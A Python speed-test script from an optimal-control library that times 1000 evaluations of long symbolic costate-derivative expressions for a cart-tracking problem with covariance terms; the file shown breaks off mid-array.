ace09f44229c99d57942130892e4f0ccc4bd59aa
| 48,786
|
py
|
Python
|
examples/Nolan/AFRL/Carts/SpeedTest4.py
|
Rapid-Design-of-Systems-Laboratory/beluga-legacy
|
d14713d8211b64293c4427005cf02fbd58630598
|
[
"MIT"
] | 1
|
2019-03-26T03:00:03.000Z
|
2019-03-26T03:00:03.000Z
|
examples/Nolan/AFRL/Carts/SpeedTest4.py
|
Rapid-Design-of-Systems-Laboratory/beluga-legacy
|
d14713d8211b64293c4427005cf02fbd58630598
|
[
"MIT"
] | null | null | null |
examples/Nolan/AFRL/Carts/SpeedTest4.py
|
Rapid-Design-of-Systems-Laboratory/beluga-legacy
|
d14713d8211b64293c4427005cf02fbd58630598
|
[
"MIT"
] | 1
|
2019-07-14T22:53:52.000Z
|
2019-07-14T22:53:52.000Z
|
import numpy as np
from beluga.utils.math import *
from beluga.utils.tictoc import *
tf = 1
Dt = 0.1
sigv = 0.1
sigw = 0.1
sigr = 0.1
w = 3.1415/2
xb = 5
yb = 5
u_max = 0.1
v = 30
x_n = 100
y_n = 1e-4
theta_n = 0.1
p11_n = 1e5
p12_n = 1e5
p13_n = 1e5
p22_n = 1e5
p23_n = 1e5
p33_n = 1e5
lamX_N = 50
lamY_N = -100
lamTHETA_N = 2
lamP11_N = 1
lamP12_N = 1
lamP13_N = 1
lamP22_N = 1
lamP23_N = 1
lamP33_N = 1
x_s = 1
y_s = 1
theta_s = 1
p11_s = 1e-3
p12_s = 1e-3
p13_s = 1e-3
p22_s = 1e-1
p23_s = 1e-2
p33_s = 1e-3
ep = 5
tic()
for i in range(1000):
fx = np.array([
(tf)*(-lamP11_N*(p11_n*p11_s*x_s*(x_n*x_s - xb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p11_n*p11_s*x_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p11_n*p11_s*(x_n*x_s - xb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*(y_n*y_s - yb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s - lamP12_N*(p12_n*p12_s*x_s*(x_n*x_s - xb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*x_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(x_n*x_s - xb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p22_n*p22_s*(y_n*y_s - yb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s - lamP13_N*(p13_n*p13_s*x_s*(x_n*x_s - xb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*x_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s - lamP22_N*(p12_n*p12_s*x_s*(x_n*x_s - xb)**2*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*x_s*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(x_n*x_s - xb)*(-p12_n*p12_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p22_n*p22_s*(y_n*y_s - yb)*(-p12_n*p12_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s - lamP23_N*(p13_n*p13_s*x_s*(x_n*x_s - xb)**2*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*x_s*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p12_n*p12_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p12_n*p12_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s - lamP33_N*(p13_n*p13_s*x_s*(x_n*x_s - xb)**2*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*x_s*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p13_n*p13_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p13_n*p13_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p13_n*p13_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p13_n*p13_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p13_n*p13_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p13_n*p13_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p33_s),
(tf)*(-lamP11_N*(p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p11_n*p11_s*(x_n*x_s - xb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p12_n*p12_s*y_s*(y_n*y_s - yb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*y_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(y_n*y_s - yb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s - lamP12_N*(p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*(x_n*x_s - xb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p22_n*p22_s*y_s*(y_n*y_s - yb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p22_n*p22_s*y_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s - lamP13_N*(p13_n*p13_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*y_s*(y_n*y_s - yb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*y_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s - lamP22_N*(p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*(x_n*x_s - xb)*(-p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p22_n*p22_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p22_n*p22_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p22_n*p22_s*y_s*(y_n*y_s - yb)**2*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p22_n*p22_s*y_s*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(-p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p22_n*p22_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p22_n*p22_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s - lamP23_N*(p13_n*p13_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p22_n*p22_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p22_n*p22_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*y_s*(y_n*y_s - yb)**2*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*y_s*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p22_n*p22_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p22_n*p22_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s - lamP33_N*(p13_n*p13_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p13_n*p13_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p13_n*p13_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p13_n*p13_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*y_s*(y_n*y_s - yb)**2*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*y_s*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p13_n*p13_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p13_n*p13_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p13_n*p13_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p33_s),
(tf)*(-lamP11_N*(-2*Dt*sigv**2*theta_s*sin(theta_n*theta_s)*cos(theta_n*theta_s) - 2*p13_n*p13_s*theta_s*v*cos(theta_n*theta_s))/p11_s - lamP12_N*(-Dt*sigv**2*theta_s*sin(theta_n*theta_s)**2 + Dt*sigv**2*theta_s*cos(theta_n*theta_s)**2 - p13_n*p13_s*theta_s*v*sin(theta_n*theta_s) - p13_n*p13_s*theta_s*v*cos(theta_n*theta_s))/p12_s + lamP13_N*p33_n*p33_s*theta_s*v*cos(theta_n*theta_s)/p13_s - lamP22_N*(2*Dt*sigv**2*theta_s*sin(theta_n*theta_s)*cos(theta_n*theta_s) - p13_n*p13_s*theta_s*v*sin(theta_n*theta_s) - p23_n*p23_s*theta_s*v*sin(theta_n*theta_s))/p22_s + lamP23_N*p33_n*p33_s*theta_s*v*sin(theta_n*theta_s)/p23_s + lamX_N*theta_s*v*sin(theta_n*theta_s)/x_s - lamY_N*theta_s*v*cos(theta_n*theta_s)/y_s),
